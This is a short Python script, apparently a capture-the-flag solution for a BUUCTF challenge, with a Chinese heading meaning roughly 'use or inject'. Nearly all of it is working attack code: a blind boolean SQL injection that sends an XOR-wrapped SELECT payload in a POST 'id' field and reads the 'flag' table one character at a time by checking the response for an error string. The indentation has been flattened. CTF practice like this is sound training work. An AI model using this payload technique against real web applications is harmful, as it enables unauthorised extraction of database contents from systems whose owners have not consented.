利用抑或注入
# coding=utf-8
import requests
dic = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,-{}"
url = "http://f1f5f36b-b735-4827-8ff2-1582d26acb7b.node3.buuoj.cn/index.php"
keyword = "Error Occured When Fetch Result"
string = ""
for i in range(1, 50):
for j in dic:
payload = "1^(SELECT(ASCII(MID((SELECT((flag))FROM(flag)),{0},1))={1}))^1=1".format(str(i), ord(j))
data = {
'id': payload
}
url_get = url
# print(url_get)
content = requests.post(url_get, data=data)
#print(len(content.text))
if keyword not in content.text and 'bool(false)' not in content.text:
string += j
print(string)
break
print("result = " + string)
